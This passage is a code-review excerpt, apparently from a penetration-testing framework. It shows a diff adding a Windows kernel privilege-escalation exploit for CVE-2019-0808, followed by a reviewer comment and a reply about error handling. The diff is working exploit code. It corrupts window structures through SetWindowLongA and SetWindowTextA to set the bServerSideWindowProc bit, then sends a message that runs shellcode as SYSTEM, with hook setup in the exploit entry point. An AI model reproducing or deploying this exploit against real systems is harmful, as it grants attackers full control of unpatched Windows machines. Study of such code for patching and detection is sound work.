external/source/exploits/CVE-2019-0808/NtUserMNDragOverExploit/dllmain.cpp

```diff
@@ -0,0 +1,686 @@
+			UINT offset = 0; // Create the offset variable which will hold the offset from the start of
+							// hPrimaryWindow's cbwnd data field to write to.
+
+			UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0); // Set addressOfStartofPrimaryWndCbWndData to the address of
+																					  // the start of hPrimaryWindow's cbwnd data field.
+
+			// Set offset to the difference between hSecondaryWindow's
+			// strName.Buffer's memory address and the address of
+			// hPrimaryWindow's cbwnd data field.
+			offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData);
+			dprintf("[*] Offset: 0x%08X\r\n", offset);
+
+			// Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16), or the address of the bServerSideWindowProc bit.
+			if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) {
+				dprintf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError());
+				ExitProcess(-1);
+			}
+			else {
+				dprintf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset));
+			}
+
+			// Write the value \x06 to it to set the bServerSideWindowProc bit in hSecondaryWindow.
+			if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {
+				dprintf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());
+				ExitProcess(-1);
+			}
+			else {
+				dprintf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));
+				dprintf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");
+				SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);
+				if (success == TRUE) {
+					dprintf("[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!\r\n");
+				}
+				else {
+					dprintf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
+					ExitProcess(-1);
+				}
+			}
+		}
+	}
+	return CallNextHookEx(0, code, wParam, lParam);
+}
+
+int exploit(PMSF_PAYLOAD pMsfPayload)
+{
+	dprintf("[*] Exploiting!\r\n");
+
+	// Create the primary popup menu and its submenu
+	HMENU hMenuRoot = CreatePopupMenu();
+	HMENU hMenuSub = CreatePopupMenu();
+
+	// Get a HINSTANCE handle to the current process.
+	HINSTANCE hInst = GetModuleHandleA(NULL);
+
+	// Get the address of NtAllocateVirtualMemory from ntdll.dll's export table.
+	pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
+
+	// Set the window hook and the event hook.
+	SetWindowsHookEx(WH_CALLWNDPROC, (HOOKPROC)WindowHookProc, hInst, GetCurrentThreadId());
+	SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, hInst, DisplayEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0);

```

Comment:
Again both of these calls implicitly trust that they will succeed. More error handling is needed here.

Reply:
More checks were added to both of these calls in the last commit.